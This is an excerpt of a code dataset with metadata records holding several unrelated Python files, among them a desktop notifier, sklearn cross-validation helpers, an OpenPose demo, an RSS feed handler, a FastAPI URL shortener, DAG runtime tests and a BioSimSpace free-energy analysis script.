"matplotlib.widgets.Slider", "line_number": 112, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 124, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 136, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "40223699893", "text": "import time\r\nfrom plyer import notification\r\n\r\nnotification_title = 'Hello'\r\nnotification_message = 'Drink Some Water. Have a Nice Day.'\r\n\r\nnotification.notify(\r\n title = notification_title,\r\n message = notification_message,\r\n app_icon = r\"C:/Users/Yashraj/OneDrive/Documents/SYNC/python.ico\",\r\n timeout = 10,\r\n toast = False\r\n )", "repo_name": "yashrajmodani/DesktopNotifier", "sub_path": "task1.py", "file_name": "task1.py", "file_ext": "py", "file_size_in_byte": 347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "plyer.notification.notify", "line_number": 7, "usage_type": "call"}, {"api_name": "plyer.notification", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "29702660489", "text": "from joblib import Parallel, delayed\nfrom sklearn.metrics._scorer import get_scorer\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.base import clone\nfrom sklearn.utils.multiclass import type_of_target\n\n\ndef cross_val_fit(estimator, X, y, cv, metric, n_jobs=-1):\n \"\"\"Generate cross-validated estimators for all folds\n\n Args:\n estimator: estimator object implementing 'fit' and 'predict'\n X (array like): (n_samples, n_features)\n y (array like): (n_samples,)\n cv (int, cross-validation generator ): number of folds. You can also pass a predefined CV splitter\n metric (str): metric to return for each fold\n n_jobs (int): Number of jobs to run in parallel\n \n Returns:\n (list): A list of dictionaries containing 'score', 'scorer', and 'estimator'\n score: Calculated metric\n scorer: The scorer function used for calculating the metric\n estimator: Fitted estimator\n \"\"\"\n scorer = get_scorer(metric)\n \n cv = _check_cv(y, cv)\n splits = list(cv.split(X, y))\n parallel = Parallel(n_jobs=n_jobs)\n results = parallel(\n delayed(_fit_estimator)(clone(estimator), X, y, train_index, test_index, scorer)\n for train_index, test_index in splits)\n return results\n\n\ndef _fit_estimator(estimator, X, y, train_index, test_index, scorer):\n \"\"\"Helper function for fiting the estimator to the training data\n and returning the evaluated metric along with the scorer used for the metric\n \"\"\"\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n estimator.fit(X_train, y_train)\n y_pred = estimator.predict(X_test)\n predict_proba = getattr(estimator, \"predict_proba\", None)\n y_prob = None\n if callable(predict_proba):\n y_prob = predict_proba(X_test)\n return {'score': scorer(estimator, X_test, y_test),\n 'estimator': estimator,\n 'scorer': scorer,\n 'y_pred': y_pred,\n 'y_prob': y_prob,\n 'test_index': test_index}\n\ndef _check_cv(y, cv):\n \"\"\"\"Helper function to determine the CV type\"\"\"\n classification_target_types = ('binary', 'multiclass')\n if hasattr(cv, 'split'):\n return cv\n if type_of_target(y) in classification_target_types:\n return StratifiedKFold(n_splits=cv)\n else:\n return KFold(n_splits=cv)", "repo_name": "kkarbasi/ML_toolkit", "sub_path": "cv_tools/cv_utils_save.py", "file_name": "cv_utils_save.py", "file_ext": "py", "file_size_in_byte": 2417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sklearn.metrics._scorer.get_scorer", "line_number": 25, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 29, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.utils.multiclass.type_of_target", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "38359933307", "text": "import sys\nimport time\nimport cv2\n\ntry:\n sys.path.append('/usr/local/python')\n from openpose import pyopenpose as op\nexcept ImportError as e:\n print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` '\n 'in CMake and have this Python script in the right folder?')\n raise e\n\n# Custom Params (refer to include/openpose/flags.hpp for more parameters)\nparams = dict()\nparams[\"model_folder\"] = \"/home/louisme/library/openpose/models\"\n\n\nif __name__ == '__main__' :\n # Starting OpenPose\n opWrapper = op.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Process Image\n datum = op.Datum()\n cap = cv2.VideoCapture('/home/louisme/PycharmProjects/takePicture/video.mp4')\n while True:\n start = time.time()\n ret, imageToProcess = cap.read()\n if not ret:\n break\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop([datum])\n\n # Display Image\n end = time.time()\n # print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n output = datum.cvOutputData\n cv2.putText(output, str(1/(end-start)), (20,20), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.imshow(\"frame\", output)\n q = cv2.waitKey(1)\n if q == ord('q'):\n break", "repo_name": "ambersun1234/AART", "sub_path": "AART_project/backupFile/openpose example.py", "file_name": "openpose example.py", "file_ext": "py", "file_size_in_byte": 1323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "openpose.pyopenpose.WrapperPython", "line_number": 20, "usage_type": "call"}, {"api_name": "openpose.pyopenpose", "line_number": 20, "usage_type": "name"}, {"api_name": "openpose.pyopenpose.Datum", "line_number": 25, "usage_type": "call"}, {"api_name": "openpose.pyopenpose", "line_number": 25, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "30364548436", "text": "import datetime\nimport logging\n\nfrom google.appengine.ext import webapp\n\nfrom vendor import PyRSS2Gen\n\nfrom models.post import Post\n\n\nclass FeedHandler(webapp.RequestHandler):\n def get(self):\n\n rss_items = []\n\n # fetch all posts from the db\n logging.info(\"FeedHandler::get() - Fetching posts from the db\")\n q = Post.all()\n q.order(\"-created_at\")\n results = q.fetch(20)\n\n for p in results:\n rss_items.append(\n PyRSS2Gen.RSSItem(\n title = \"Tasty Burger Friday\",\n link = \"http://www.tasty-babelsberg.de\",\n description = p.content,\n # guid = PyRSS2Gen.Guid('Guid{0}'.format(p.key().id())),\n pubDate = p.created_at\n )\n )\n\n logging.info(\"Building the RSS\")\n\n # build the rss\n rss = PyRSS2Gen.RSS2(\n title = \"Tasty Burger Feed\",\n link = \"http://www.tasty-babelsberg.de\",\n description = \"Tasty Burger Friday\",\n lastBuildDate = datetime.datetime.now(),\n\n items = rss_items\n )\n\n self.response.headers['Content-Type'] = 'application/rss+xml'\n self.response.out.write(rss.to_xml())\n", "repo_name": "polym0rph/TastyBurger", "sub_path": "feed.py", "file_name": "feed.py", "file_ext": "py", "file_size_in_byte": 1266, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 11, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "models.post.Post.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.post.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "vendor.PyRSS2Gen.RSSItem", "line_number": 24, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen", "line_number": 24, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen.RSS2", "line_number": 36, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "13917076220", "text": "import asyncio\nimport datetime\n\nimport qrcode\nimport requests\nfrom fastapi import APIRouter, Depends\nfrom fastapi.responses import FileResponse, JSONResponse, RedirectResponse\nfrom starlette.requests import Request\nfrom starlette.responses import Response\n\nimport app.api.analytics.dao as AnalyticsDAO\nimport app.api.shortie.dao as ShortieDAO\nfrom app.api.analytics.models import Analytics\nfrom app.api.auth.funcs import is_authorized, should_throttle\nfrom app.api.shortie.funcs import base62encode, make_short_url\nfrom app.api.shortie.models import ShortenedURL\nfrom app.api.shortie.schemas import (\n DeleteResponse,\n LongUrl,\n ShortenReponse,\n ShortUrlId,\n UpdateResponse,\n)\nfrom app.api.users.models import User\nfrom app.cache.conn import RedisClientManager\nfrom app.core.config import get_settings\n\nsettings = get_settings()\n\nrouter = APIRouter()\n\n\n@router.get(\"/{short_url_id}\", response_class=RedirectResponse)\nasync def read(short_url_id: str, request: Request, response: Response):\n now = datetime.datetime.now()\n\n shortened_url, short_url_analytics = (\n await ShortieDAO.find_by_short_url_id_or_alias(short_url_id),\n await AnalyticsDAO.find_by_short_url_id_or_alias(short_url_id),\n )\n\n short_url_analytics.clicks += 1\n short_url_analytics.last_visited = now\n\n await short_url_analytics.save()\n\n long_url = shortened_url.long_url\n\n if not (long_url.startswith(\"https://\") or long_url.startswith(\"http://\")):\n try:\n schemes = [\"https://\", \"http://\"]\n for scheme in schemes:\n r = requests.head(scheme + long_url)\n if r.status_code < 400:\n return RedirectResponse(scheme + long_url)\n except requests.exceptions.RequestException:\n pass\n\n return RedirectResponse(long_url)\n\n\n@router.post(\"\")\nasync def create(\n body: LongUrl,\n request: Request,\n user: User | None = Depends(should_throttle),\n):\n with RedisClientManager() as cache:\n counter = cache.incr(settings.COUNTER_CACHE_KEY)\n short_url_id = base62encode(counter - 1)\n short_url = make_short_url(short_url_id)\n alias, long_url = body.alias, body.long_url\n if user:\n user_pk = user.pk\n else:\n user_pk = None\n if request.client:\n user_pk = request.client.host\n\n if alias and await ShortieDAO.alias_already_exists(alias):\n return JSONResponse(\n status_code=200,\n content={\"error\": f\"alias {alias} is already taken.\"},\n )\n\n shortened_url, shortened_url_analytics = (\n ShortenedURL(\n short_url_id=short_url_id,\n alias=alias,\n short_url=short_url,\n long_url=long_url,\n owner=user_pk,\n ),\n Analytics(\n short_url_id=short_url_id,\n alias=alias,\n owner=user_pk,\n ),\n )\n\n ttl = settings.CACHE_TTL\n asyncio.gather(\n shortened_url.save(),\n shortened_url.expire(ttl),\n shortened_url_analytics.save(),\n shortened_url_analytics.expire(ttl),\n )\n\n return ShortenReponse(\n short_url_id=short_url_id,\n alias=alias,\n short_url=short_url,\n long_url=long_url,\n )\n\n\n@router.put(\"/{short_url_id}\", dependencies=[Depends(is_authorized)])\nasync def udpate(short_url_id: str, body: LongUrl):\n shortened_url = await ShortieDAO.find_by_short_url_id(short_url_id)\n\n previous_long_url, new_long_url = shortened_url.long_url, body.long_url\n short_url = shortened_url.short_url\n shortened_url.long_url = new_long_url\n\n await shortened_url.save()\n\n return UpdateResponse(\n short_url_id=short_url_id,\n short_url=short_url,\n previous_long_url=previous_long_url,\n new_long_url=new_long_url,\n )\n\n\n@router.delete(\"/{short_url_id}\", dependencies=[Depends(is_authorized)])\nasync def delete(short_url_id: str):\n shortened_url = await ShortieDAO.find_by_short_url_id(short_url_id)\n\n await shortened_url.delete(shortened_url.pk)\n\n return DeleteResponse(\n short_url_id=short_url_id,\n short_url=shortened_url.short_url,\n long_url=shortened_url.long_url,\n )\n\n\n@router.post(\"/qr\", response_class=FileResponse)\nasync def qr(body: ShortUrlId):\n short_url = await ShortieDAO.find_by_short_url_id_or_alias(\n body.short_url_id\n )\n\n # TODO: change to deployed host/short_url_id\n img = qrcode.make(short_url.long_url)\n\n filename = f\"/tmp/{body.short_url_id}.png\"\n\n img.save(filename)\n\n return FileResponse(filename)\n", "repo_name": "RafaelBroseghini/shortie", "sub_path": "app/api/shortie/endpoints.py", "file_name": "endpoints.py", "file_ext": "py", "file_size_in_byte": 4743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "app.core.config.get_settings", "line_number": 28, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 30, "usage_type": "call"}, {"api_name": "starlette.requests.Request", "line_number": 34, "usage_type": "name"}, {"api_name": "starlette.responses.Response", "line_number": 34, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id_or_alias", "line_number": 38, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 38, "usage_type": "name"}, {"api_name": "app.api.analytics.dao.find_by_short_url_id_or_alias", "line_number": 39, "usage_type": "call"}, {"api_name": "app.api.analytics.dao", "line_number": 39, "usage_type": "name"}, {"api_name": "requests.head", "line_number": 53, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 56, "usage_type": "attribute"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 33, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.LongUrl", "line_number": 64, "usage_type": "name"}, {"api_name": "starlette.requests.Request", "line_number": 65, "usage_type": "name"}, {"api_name": "app.api.users.models.User", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 66, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.should_throttle", "line_number": 66, "usage_type": "argument"}, {"api_name": "app.cache.conn.RedisClientManager", "line_number": 68, "usage_type": "call"}, {"api_name": "app.api.shortie.funcs.base62encode", "line_number": 70, "usage_type": "call"}, {"api_name": "app.api.shortie.funcs.make_short_url", "line_number": 71, "usage_type": "call"}, {"api_name": "app.api.shortie.dao.alias_already_exists", "line_number": 80, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 80, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "app.api.shortie.models.ShortenedURL", "line_number": 87, "usage_type": "call"}, {"api_name": "app.api.analytics.models.Analytics", "line_number": 94, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 102, "usage_type": "call"}, {"api_name": "app.api.shortie.schemas.ShortenReponse", "line_number": 109, "usage_type": "call"}, {"api_name": "app.api.shortie.schemas.LongUrl", "line_number": 118, "usage_type": "name"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id", "line_number": 119, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 119, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.UpdateResponse", "line_number": 127, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 117, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.is_authorized", "line_number": 117, "usage_type": "argument"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id", "line_number": 137, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 137, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.DeleteResponse", "line_number": 141, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 135, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.is_authorized", "line_number": 135, "usage_type": "argument"}, {"api_name": "app.api.shortie.schemas.ShortUrlId", "line_number": 149, "usage_type": "name"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id_or_alias", "line_number": 150, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 150, "usage_type": "name"}, {"api_name": "qrcode.make", "line_number": 155, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 161, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 148, "usage_type": "name"}]}
+{"seq_id": "22116118140", "text": "from urllib import parse\nimport json\n\n\nclass Messages:\n def __init__(self, game_type):\n self._game_type = '_' + game_type\n\n def create_request(self, method, game_id, **args):\n request = [('method', method + self._game_type), ('id', str(game_id))]\n for key in args:\n args[key] = str(args[key])\n request.extend(args.items())\n return json.dumps(request)\n\n @staticmethod\n def generate_response(status_code, body_return_value):\n if status_code == 200:\n return_dict = {\"Headers\": {\"Status\": status_code}, \"Payload\": {\"Result\": body_return_value}}\n else:\n return_dict = {\"Headers\": {\"Status\": status_code}, \"Payload\": {\"Error Message\": \"Not found\"}}\n return json.dumps(return_dict)\n\n @staticmethod\n def parse_incoming_request(data):\n \"\"\"\n Parse request parameters\n if this function raises KeyError\n the main server loop closes the connection automatically\n \"\"\"\n data_str = data.decode(encoding='UTF-8')\n request_params_list = json.loads(data_str)\n if request_params_list[0][0] != 'method' or request_params_list[1][0] != 'id':\n raise ValueError('Query string does not include method and id at the beginning')\n method = request_params_list[0][1]\n game_id = request_params_list[1][1]\n optional_params_list = [item[1] for item in request_params_list[2:]]\n return method, game_id, optional_params_list\n\n @staticmethod\n def prepare_response(response):\n \"\"\"\n on failure return empty response to the client\n it would be much better to use HTTP instead of sock library\n and return standard status codes like 200 or 404 to the client\n this function mimics that behavior\n \"\"\"\n if response is None:\n json_ret = Messages.generate_response(404, \"\")\n else:\n json_ret = Messages.generate_response(200, response)\n return json_ret\n\n @staticmethod\n def process_response(data):\n data_dict = json.loads(data)\n if data_dict.get(\"Headers\").get(\"Status\") == 404:\n response = None\n else:\n response = data_dict.get(\"Payload\").get(\"Result\")\n return response\n", "repo_name": "phpl/pite_lab3", "sub_path": "game/common/messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "27918337848", "text": "\"\"\"Verify examples work with the provided runtimes.\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Callable, Mapping\n\nimport yaml\nfrom deepdiff import DeepDiff\n\nfrom dagger import DAG\n\n\ndef verify_dag_works_with_all_runtimes(\n dag: DAG,\n params: Mapping[str, bytes],\n validate_results: Callable[[Mapping[str, bytes]], None],\n argo_workflow_yaml_filename: str,\n):\n \"\"\"\n Run/Compile the DAG using all available runtimes and verifies its behavior or expectations.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n\n argo_workflow_yaml_filename\n The filename of the YAML manifest we expect the Argo runtime to produce\n \"\"\"\n verify_dag_works_with_local_runtime(\n dag,\n params=params,\n validate_results=validate_results,\n )\n verify_dag_works_with_cli_runtime(\n dag,\n params=params,\n validate_results=validate_results,\n )\n verify_dag_matches_expected_manifest_when_using_argo_runtime(\n dag,\n params=params,\n expected_manifest=_load_argo_manifest(argo_workflow_yaml_filename),\n )\n\n\ndef verify_dag_works_with_local_runtime(\n dag: DAG,\n params: Mapping[str, Any],\n validate_results: Callable[[Mapping[str, bytes]], None],\n):\n \"\"\"\n Run the DAG using the local runtime, and calls the supplied function to validate the results.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n \"\"\"\n from dagger.runtime.local import invoke\n\n results = invoke(dag, params=params)\n validate_results(results)\n\n\ndef verify_dag_works_with_cli_runtime(\n dag: DAG,\n params: Mapping[str, Any],\n validate_results: Callable[[Mapping[str, bytes]], None],\n):\n \"\"\"\n Run the DAG using the CLI runtime, and calls the supplied function to validate the results.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n \"\"\"\n import itertools\n import os\n import tempfile\n\n from dagger.runtime.cli import invoke\n\n with tempfile.TemporaryDirectory() as tmp:\n\n for param_name, param_value in params.items():\n with open(os.path.join(tmp, param_name), \"wb\") as f:\n serializer = dag.inputs[param_name].serializer\n serializer.serialize(param_value, f)\n\n invoke(\n dag,\n argv=itertools.chain(\n *[\n [\"--input\", param_name, os.path.join(tmp, param_name)]\n for param_name in params\n ],\n *[\n [\"--output\", output_name, os.path.join(tmp, output_name)]\n for output_name in dag.outputs\n ],\n ),\n )\n\n results = {}\n for output_name, output_type in dag.outputs.items():\n with open(os.path.join(tmp, output_name), \"rb\") as f:\n results[output_name] = output_type.serializer.deserialize(f)\n\n validate_results(results)\n\n\ndef verify_dag_matches_expected_manifest_when_using_argo_runtime(\n dag: DAG,\n params: Mapping[str, bytes],\n expected_manifest: dict,\n):\n \"\"\"\n Compile the DAG into Argo CRD manifests using the Argo runtime, and validates the results against a pre-compiled version that has been tested previously.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n expected_manifest\n An Argo CRD representing a workflow that runs the supplied DAG.\n We only check the 'spec' section of the workflow. Therefore, metadata, API versioning or scheduling options do not have any effect on the result of calling this function.\n \"\"\"\n import dagger.runtime.argo as argo\n\n try:\n container_entrypoint = [\n template[\"container\"].get(\"command\", [])\n for template in expected_manifest[\"spec\"][\"templates\"]\n if \"container\" in template\n ][0]\n except KeyError:\n raise ValueError(\n \"The argo manifest you pointed to does not contain any template that uses a container. We expect DAGs to have, at least, one task, and the task to be executed through a container. There may be a mistake with the file you created. Please check other examples for reference.\"\n )\n\n generated_manifest = argo.workflow_manifest(\n dag,\n metadata=argo.Metadata(name=\"some-name\"),\n workflow=argo.Workflow(\n params=params,\n container_image=\"local.registry/dagger\",\n container_entrypoint_to_dag_cli=container_entrypoint,\n ),\n )\n\n diff = DeepDiff(\n expected_manifest[\"spec\"],\n generated_manifest[\"spec\"],\n ignore_order=True,\n view=\"tree\",\n )\n\n print(f\"Generated manifest is:\\n{yaml.dump(generated_manifest)}\")\n print(diff.pretty())\n assert not diff\n\n\ndef _load_argo_manifest(filename: str):\n path = Path(__file__).parent / \"argo\" / filename\n with open(path, \"r\") as f:\n return yaml.safe_load(f)\n", "repo_name": "larribas/dagger", "sub_path": "tests/examples/verification.py", "file_name": "verification.py", "file_ext": "py", "file_size_in_byte": 5381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "32", "api": [{"api_name": "dagger.DAG", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 15, "usage_type": "name"}, {"api_name": "dagger.DAG", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 55, "usage_type": "name"}, {"api_name": "dagger.runtime.local.invoke", "line_number": 73, "usage_type": "call"}, {"api_name": "dagger.DAG", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 80, "usage_type": "name"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "dagger.runtime.cli.invoke", "line_number": 109, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dagger.DAG", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 133, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.workflow_manifest", "line_number": 164, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 164, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.Metadata", "line_number": 166, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 166, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.Workflow", "line_number": 167, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 167, "usage_type": "name"}, {"api_name": "deepdiff.DeepDiff", "line_number": 174, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 187, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 189, "usage_type": "call"}]}
+{"seq_id": "28630348656", "text": "import BioSimSpace as BSS\nfrom BioSimSpace import _Exceptions\nimport sys\nimport csv\nimport os\nimport numpy as np\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nprint (\"%s %s %s %s\" % (sys.argv[0], sys.argv[1], sys.argv[2], sys.argv[3]))\nresults_file_path = \"./outputs/summary.csv\"\n\ndef plotOverlapMatrix(overlap_matrix, savepath):\n\t\"\"\"\n\tGiven a SOMD-style overlap numpy matrix, plot heatmap in best practices style.\n\n\t--args\n\toverlap matrix (array): numpy 2D array of (n,n)\n\n\t--returns\n None; saves plot instead.\n\t\"\"\"\n\n\n\tovlp_mtx = overlap_matrix\n\n\tcmap = colors.ListedColormap(['#FBE8EB','#88CCEE','#78C592', '#117733'])\n\tbounds=[0.0, 0.025, 0.1, 0.3,0.8]\n\tnorm = colors.BoundaryNorm(bounds, cmap.N, clip=False)\n\tcbar_kws=dict(ticks=[.025, .1, .3,0.8], label='Phase space overlap')\n\tax = sns.heatmap(ovlp_mtx,annot=False, fmt='.2f', linewidths=.3,\n\t annot_kws={\"size\": 14},square=True,robust=True,cmap=cmap,\n\t norm=norm,cbar_kws=cbar_kws)\n\tax.xaxis.tick_top()\n\n\tplt.savefig(savepath, dpi=200)\n\n# simply load the FEP directory of the corresponding ligand using BSS.\n# this function computes the binding free energy as well.\n\n#print (sys.argv)\nengine = sys.argv[3].rstrip()\n#print (\"@%s@\" % sys.argv[1])\n#print (\"@%s@\" % sys.argv[2])\n#print (\"@%s@\" % engine)\n\npath_to_dir = f\"./outputs/{engine}/{sys.argv[1]}~{sys.argv[2]}\"\nprint (path_to_dir)\n#path_to_dir = \"./outputs/%s/%s~%s\" % (engine, sys.argv[1], sys.argv[2])\n#print (path_to_dir)\nfreenrg_val = \"NaN\"\nfreenrg_err = \"NaN\"\ntry:\n pmf_bound, overlap_matrix_bound = BSS.FreeEnergy.Relative.analyse(path_to_dir+\"/bound\")\n pmf_free, overlap_matrix_free = BSS.FreeEnergy.Relative.analyse(path_to_dir+\"/free\")\n\n freenrg = BSS.FreeEnergy.Relative.difference(pmf_bound, pmf_free)\n freenrg_val = round(freenrg[0].value(), 4)\n freenrg_err = round(freenrg[1].value(), 4)\n\nexcept _Exceptions.AnalysisError:\n freenrg_val = freenrg_err = \"NaN\"\n overlap_matrix_bound = overlap_matrix_free = None\n\n\ndata_point = [sys.argv[1], sys.argv[2], str(freenrg_val), str(freenrg_err), engine]\n\n####### WRITING DATA\n\n# use csv to open the results file.\nwith open(results_file_path, \"a\") as freenrg_writefile:\n writer = csv.writer(freenrg_writefile)\n \n # first, write a header if the file is created for the first time.\n if os.path.getsize(results_file_path) == 0:\n print(f\"Starting {results_file_path} file.\")\n writer.writerow([\"lig_1\", \"lig_2\", \"freenrg\", \"error\", \"engine\"])\n\n \nwith open(results_file_path, \"r\") as freenrg_readfile:\n # then, grab all of the data that is already in the file.\n reader = csv.reader(freenrg_readfile)\n data_entries = [ row for row in reader ]\n\n# check if our data entry is not already in the results file. Raise an error if is.\nif data_point in data_entries:\n raise Exception(f\"Results for this run are already in {results_file_path}. Exiting.\")\n\n# at this point we know that we are writing a new entry in the results file. Append the line to the file.\n# use csv to open the results file.\nwith open(results_file_path, \"a\") as freenrg_writefile:\n writer = csv.writer(freenrg_writefile)\n\n print(\"Writing MBAR results. Free energy of binding and error are (rsp.):\")\n print(freenrg)\n writer.writerow(data_point)\n\n\n# in case of SOMD, we will also have overlap matrices for both legs. These are helpful for troubleshooting, so store \n# them in ./logs/\nif overlap_matrix_bound:\n np.save(f\"logs/overlap_bound_{sys.argv[1]}~{sys.argv[2]}\", np.matrix(overlap_matrix_bound))\n plotOverlapMatrix(np.matrix(overlap_matrix_bound), 